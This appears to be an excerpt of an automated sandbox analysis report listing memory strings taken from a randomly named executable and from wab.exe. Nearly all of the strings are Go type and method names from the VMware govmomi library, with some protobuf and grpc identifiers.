            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmfsDatastoreSingleExtentOption).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VMwareDvsLacpApiVersion.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GatewayHostNotReachable).GetHostConnectFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DrsDisabledEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfDiskOrderConstraintFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostSgxInfoSgxStates.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReleaseManagedSnapshotRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DVSConfigInfo).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationSpec).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostCpuSchedulerInfoCpuSchedulerPolicyInfo.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/xml.(*Decoder).Token
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NoAvailableIp).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[7]github.com/vmware/govmomi/vim25/types.DiagnosticManagerLogCreator
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*WitnessNodeInfo).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotAccessVmDevice).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*AffinityType).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsIpPortRange).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UnlicensedVirtualMachinesFoundEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DatacenterConfigSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VcAgentUninstallFailedEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VsanHostDiskResultState.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.ReplicationDiskConfigFaultReasonForFault.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterComputeResourceDVSConfigurationValidation).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNetworkMappingNotSupported).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*EVCAdmissionFailedCPUVendorUnknown).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UpdateKmsSignedCsrClientCertRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortRuntimeChangeEvent).GetEvent
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: 2*[]types.VirtualMachineCloneSpecTpmProvisionPolicy
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*TaskEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.NvdimmNamespaceType.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ThirdPartyLicenseAssignmentFailedFault).GetRuntimeFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DistributedVirtualPortgroupBackingType).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostInternetScsiHba).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualUSB).GetVirtualDevice
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: )*[]types.VirtualMachineFeatureRequirement
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*EvaluationLicenseSource).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateTemporaryFileInGuestRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostSriovConfig).GetHostPciPassthruConfig
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortLeavePortgroupEvent).GetDvsEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.FolderDesiredHostState.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[2]github.com/vmware/govmomi/vim25/types.VMotionCompatibilityType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DrsRecoveredFromFailureEvent).GetClusterEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[2]github.com/vmware/govmomi/vim25/types.NvdimmNvdimmHealthInfoState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[4]github.com/vmware/govmomi/vim25/types.VirtualDeviceConnectInfoStatus
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfUnsupportedAttributeValueFault).GetOvfFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*AdminPasswordNotChangedEvent).GetHostEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmFailoverFailed
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: 5*types.ArrayOfVirtualMachineQuickStatsMemoryTierStats
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*RecurrentTaskScheduler).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VMotionAcrossNetworkNotSupported).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VirtualMachineConfigSpecEncryptedVMotionModes.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DisableRulesetRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UpdateKmipServerRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VirtualMachineFaultToleranceType.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNoSpaceOnController).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CustomFieldDefAddedEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.WaitForUpdatesExRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*WillModifyConfigCpuRequirements).GetMigrationFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfPropertyQualifier).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ComplianceResultStatus).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InsufficientVFlashResourcesFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterResourceUsageSummary).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ToolsImageNotAvailableFault).GetVmToolsUpgradeFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ClusterRuleSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[4]github.com/vmware/govmomi/vim25/types.VirtualAppVAppState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostMemoryTieringType).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*MultipleCertificatesVerifyFaultFault).GetHostConnectFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NoDisksToCustomize).GetMethodFault
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: &*types.UpdateVirtualMachineFilesResult
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NetworkCopyFaultFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestRegistryKeyAlreadyExists).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*PinnedCertificate).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*IncompatibleSetting).GetRuntimeFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmFailedMigrateEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: (*[2]types.VirtualMachineVMCIDeviceAction
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterComputeResourceVcsHealthStatus).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDiskSparseVer2BackingInfo).GetVirtualDeviceFileBackingInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostSystemRemediationStateState.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNoSpaceOnController).GetOvfUnsupportedPackage
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidControllerFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotReconfigureVsanWhenHaEnabledFault).GetVsanFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ConfigureCryptoKeyRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VsanUpgradeSystemUpgradeHistoryDiskGroupOpType.Values
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: /*types.UpdateVVolVirtualMachineFilesRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VAppEntityConfigInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.StoragePlacementSpecPlacementType.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*WeeklyTaskScheduler).GetTaskScheduler
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DesiredSoftwareSpecComponentSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSerialPortDeviceBackingInfo).GetVirtualDeviceBackingInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InsufficientStandbyCpuResource).GetInsufficientResourcesFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidIndexArgumentFault).GetInvalidArgument
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[3]github.com/vmware/govmomi/vim25/types.VirtualMachineConfigInfoSwapPlacementType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ScheduledTaskCreatedEvent).GetScheduledTaskEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostGraphicsConfigVgpuMode).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DatacenterEventArgument
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.ReplicationDiskConfigFaultReasonForFault.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotAccessNetwork).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VirtualPCIPassthroughVmiopBackingInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmFaultToleranceConfigIssueWrapper).GetVmFaultToleranceIssue
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Resolution"xml:"resolution" json:"resolution"-*map.bucket[int32]types.BaseVirtualController-*[10]types.HostFileSystemVolumeFileSystemType-*[11]types.DasConfigFaultDasConfigFaultReason-*[25]types.VirtualMachineFileLayoutExFileType-*[2]types.DrsInjectorWorkloadCorrelationState-*[2]types.VmShutdownOnIsolationEventOperation-*[3]types.LicenseFeatureInfoSourceRestriction-*[3]types.VirtualMachineConfigInfoNpivWwnType-*[7]types.ClusterDasVmSettingsRestartPriority-*[8]types.HostDasErrorEventHostDasErrorReason-*func() jsonerror.CustomError_CustomErrorCode-*func() []expr.SourceInfo_Extension_Component-*antlr.entry[go.shape.*uint8,go.shape.*uint8]-*[]*descriptorpb.GeneratedCodeInfo_Annotation-google.golang.org/protobuf/types/descriptorpb-*func() descriptorpb.FeatureSet_FieldPresence-*[]descriptorpb.FieldOptions_OptionTargetType-*[]*descriptorpb.UninterpretedOption_NamePart-*func() []*descriptorpb.MethodDescriptorProto-*func() descriptorpb.FileOptions_OptimizeMode-*func(*syscall.ByHandleFileInformation) error-*func(fmtsort.KeyValue, fmtsort.KeyValue) int-*map[endpoints.endpointKey]endpoints.endpoint-google.golang.org/protobuf/encoding/protowire-*map.bucket[protoreflect.Name]*filedesc.Field-*map.bucket[protoreflect.Name]*filedesc.Oneof-google.golang.org/protobuf/runtime/protoiface-*map.bucket[string]serviceconfig.MethodConfig-*func(...grpc.ServerOption) grpc.ServerOption-*func(internal.HealthChecker) grpc.DialOption-*struct { F uintptr; X0 []resolver.Endpoint }-*func(antlr.ParserRuleContext, int, int, int)-*func(*antlr.ATNConfig) (*antlr.BitSet, bool)-google.golang.org/protobuf/types/gofeaturespb-*func([]prefix.PrefixCodes, []prefix.Decoder)-*func([]prefix.PrefixCodes, []prefix.Encoder)-golang.org/x/text/encoding/traditionalchinese
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*PatchMetadataInvalid).GetPatchMetadataInvalid
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterVmReadinessReadyCondition).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDiskFlatVer2BackingInfo).GetVirtualDeviceBackingInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSoundBlaster16).GetVirtualSoundCard
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsHmsMoveInProgress).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmDasUpdateErrorEvent).GetVmEvent
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: 7*types.VirtualMachineBootOptionsNetworkBootProtocolType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[6]github.com/vmware/govmomi/vim25/types.ReplicationVmState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortConnectedEvent).GetDynamicData
